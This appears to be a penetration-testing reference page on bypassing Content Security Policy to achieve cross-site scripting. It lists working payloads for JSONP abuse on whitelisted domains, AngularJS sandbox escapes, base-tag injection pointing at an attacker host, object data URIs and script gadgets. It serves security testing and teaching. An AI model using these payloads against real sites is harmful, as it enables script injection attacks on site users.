Skip to main content

CSP Bypass Techniques

CWECWE-79
Toolsdalfox
Difficulty🔴 advanced

Bypass CSP​

Content Security Policy is the primary defense against XSS. When present, you must analyze it and find bypasses.

Identifying CSP​

curl -I https://target.com | grep -i content-security-policy

Also check for meta tag CSP:

<meta http-equiv="Content-Security-Policy" content="...">

unsafe-inline Allowed​

If script-src includes 'unsafe-inline', direct script injection works normally. No bypass needed.

unsafe-eval Allowed​

If script-src includes 'unsafe-eval', use:

  • eval(), Function(), setTimeout(string)
  • Template literal exploitation

Whitelisted Domain Exploitation​

If a CDN or third-party domain is whitelisted, find JSONP or script gadget endpoints on that domain:

<!-- JSONP endpoint on whitelisted CDN -->
<script src="https://whitelisted-cdn.com/jsonp?callback=alert"></script>

<!-- Google JSONP (if Google is whitelisted) -->
<script src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert"></script>

JSONP Endpoint Abuse​

<script src="https://whitelisted.com/api?callback=alert"></script>

Angular/Framework CSP Bypasses​

<!-- Angular sandbox escape (older versions) -->
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}

<!-- AngularJS 1.x CSP bypass -->
<input ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'">

Base Tag Injection​

If base-uri is not restricted in the CSP:

<base href="https://attacker.com/">
<!-- All relative URLs now load from attacker domain -->

Object-Data Bypass​

If object-src is not restricted:

<object data="data:text/html,<script>alert(1)</script>">

Script Gadgets​

Exploit existing scripts on the page that process DOM content unsafely:

<div data-template="<img src=x onerror=alert(1)>"></div>
<!-- If a script processes data-template and renders it as HTML -->